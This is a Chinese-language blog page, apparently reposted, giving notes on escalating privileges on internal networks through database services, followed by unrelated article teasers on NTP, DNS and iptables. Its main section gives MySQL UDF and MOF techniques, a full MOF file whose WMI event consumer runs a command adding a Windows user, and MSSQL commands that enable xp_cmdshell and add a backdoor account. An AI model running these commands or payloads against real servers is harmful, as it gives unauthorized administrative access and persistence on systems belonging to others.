内网提权-服务篇

服务提权

  • mysql

    • UDF提权

      • 要求有写权限,并且未过滤单引号
      • windows
        • UDF导出到系统目录 C:/WINDOWS/SYSTEM32/

          MYSQL版本 < 5.1

        • UDF导出到安装路径 MYSQL\Lib\Plugin

          MYSQL版本 > 5.1

      • linux
        • /usr/lib/mysql/plugin
    • MOF提权
      • 只有windows

        • 步骤

          • 1.找个可写目录,将MOF文件上传
          • 2.执行以下sql语句,mof文件内命令便会执行
          • select load_file(‘C:/wmpub/nullevt.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘
        • mofcomp.exe xxx.mof 执行mof文件
        • 调用lmofcompiler接口的$complieFile方法
        • pragma namespace(“\\.\root\subscription”)
          instance of __EventFilter as $EventFilter
          {
          EventNamespace = “Root\Cimv2”;
          Name = “filtP2”;
          Query = “Select * From __InstanceModificationEvent “
          “Where TargetInstance Isa ”Win32_LocalTime” “
          “And TargetInstance.Second = 5”;
          QueryLanguage = “WQL”;
          };
          instance of ActiveScriptEventConsumer as $Consumer
          {
          Name = “consPCSV2”;
          ScriptingEngine = “JScript”;
          ScriptText =
          “var WSH = new ActiveXObject(”WScript.Shell”)\nWSH.run(”net.exe user secist 123 /add”)“;
          };
          instance of __FilterToConsumerBinding
          {
          Consumer = $Consumer;
          Filter = $EventFilter;
          };
  • mssql
    • xp_cmdshell

      • 开启:
        EXEC sp_configure ‘show advanced options‘,1;
        RECONFIGURE;
        EXEC sp_configure ‘xp_cmdshell‘,1;
        RECONFIGURE;
      • exec xp_cmdshell ‘net user test test /add‘
    • xp_regwrite
    • xp_regread
  • tomcat
    • 弱口令

原文地址:https://www.cnblogs.com/drac4ry/p/12230049.html

时间: 2024-10-09 02:08:54

内网提权-服务篇的相关文章

秒级容灾,UCloud 内网高可用服务之三代架构演进

快节奏的生活,任何的业务异常 / 中断都是不能容忍的. 在无人化超市选购完成进行结账时,结账页面突然卡住,无法完成购买操作.这时该选择放弃手中的商品 or 继续等待? 酒店办理入住时,管理系统突然崩溃,无法查询预订记录,导致办理入住受到影响,酒店前台排起了长队-- 高可用与我们每个人都是息息相关的,在即将到来的双十一,更是对各个电商的业务可用性提出了更高的要求.对此,UCloud 提供基于内网 VIP 的高可用服务,内网 VIP 通过前后三代广播集群的设计演进,解决了复杂异构 Overlay 网

内网NTP时间同步服务部署

NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议.因为公司内网段机器的需求,不能开放外网使其去同步公共的NTP时间服务器,但这些服务器对系统时间的依赖性很高.因此,选择同网段的一台可以连外网的服务器作为内部NTP服务,让这台服务器去同步公共的NTP服务,再让同段的内网机器同步这台内部NTP服务的时间,所有内网机器的系统时间就都可以精确到毫秒级了.这样一方面是可以节省资源,一方面是就算纯内网机器也能保证时间的精确性. 服务端(内部NTP服

iptables 端口转发 实现访问内网的httpd服务

上篇文章写到通过dhcp实现客户机上网功能,由于公网地址只有一个,我想把内部服务发布到外网就需要通过 "端口转发" 来实现 1.公网服务器: eth0:公网IP eth1:内网IP - 192.168.1.1 2.HTTPD服务器: eth0:内网IP -192.168.1.100 3.实现方法: 通过访问公网IP的8080端口来实现到内网MYSQL服务器的3306端口的访问 4.在公网服务器上: iptables -t nat -A PREROUTING -p tcp --dport

centOS建立bind服务,做为内网DNS解析服务安装记录

因为内网换了路由器,这个路由器不支持静态域名解析服务.所以只能自己建立一个DNS服务. DNS服务端软件选用bind,直接yum在线安装bind.此时会直接更新另外两个软件包bind-libs,bind-utils: yum -y install bind 安装过程不放了. 装完以后,配置文件:/etc/named.conf(没有装bind-chroot,可以增加安全性,只是内网用就没装了) 编辑named.conf配置文件: // // named.conf // // Provided by

CentOS 6.8使用bind搭建内网DNS主从服务

1.DNS域名解析服务说明 > DNS域名解析服务(Domain Name System)是用于解析域名与IP地址对应关系的服务,功能上可以实现正向解析与反向解析:正向解析:根据主机名(域名)查找对应的IP地址.反向解析:根据IP地址查找对应的主机名(域名). 工作形式上又分主服务器.从服务器和缓存服务器. 主服务器:在特定区域内具有唯一性.负责维护该区域内的域名与IP地址对应关系. 从服务器:从主服务器中获得域名与IP地址对应关系并维护,以防主服务器宕机等情况. 缓存服务器:通过向其他域名解析

公网访问内网被动模式FTP服务

参考文章 https://www.cnblogs.com/nmap/p/6706550.html 被动模式端口设置不对,防火墙/路由器上的被动模式端口要和FTP服务器上设置的一致. 示例 内网FTP服务器IP 10.0.1.12,控制端口是默认的21端口,数据传输模式是被动模式 防火墙IP         202.101.102.35 控制端口 映射222.101.102.35:50021-->10.0.1.12:21 被动模式端口 映射222.101.102.35:50022-->10.0.

VMware 搭建内网测试Web服务

环境: VMware 10.0 Centos 6.5 执行: 安装web服务:sudo yum install httpd 开启web服务:service httpd start localhost,虚拟本地访问,有: 虚拟机本地启动成功,但外部本地环境无法访问. 虚拟机网络隶属于本地网络的一个子网络(外部本地主机类似路由器功能),需要映射端口. 操作:VMware->编辑->虚拟机网络编辑 为了测试,新建一个静态页面文件:Index.html <html> <div>

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql

Linux内网时钟同步问题(ntp和chrony)

我们都知道时钟同步可以使用外网服务器,在内网内不能连接外网的时候也需要时钟同步,那怎么进行呢? 选择内网的一台稳定的服务器作为时钟源,然后让其他机器都来同步这台机器即可. 注:其实ntp服务和chrony服务本质上差不多,他们之间都可以互相进行同步.不过为了避免不必要的麻烦,一般服务器都只选择同一时钟服务来讲进行同步. 一.ntp服务 安装: yum install ntp 1.服务端设置 修改配置文件cat /etc/ntp.conf 将如下外网的时钟源注释掉(前面加#) 如果这台作为内网时钟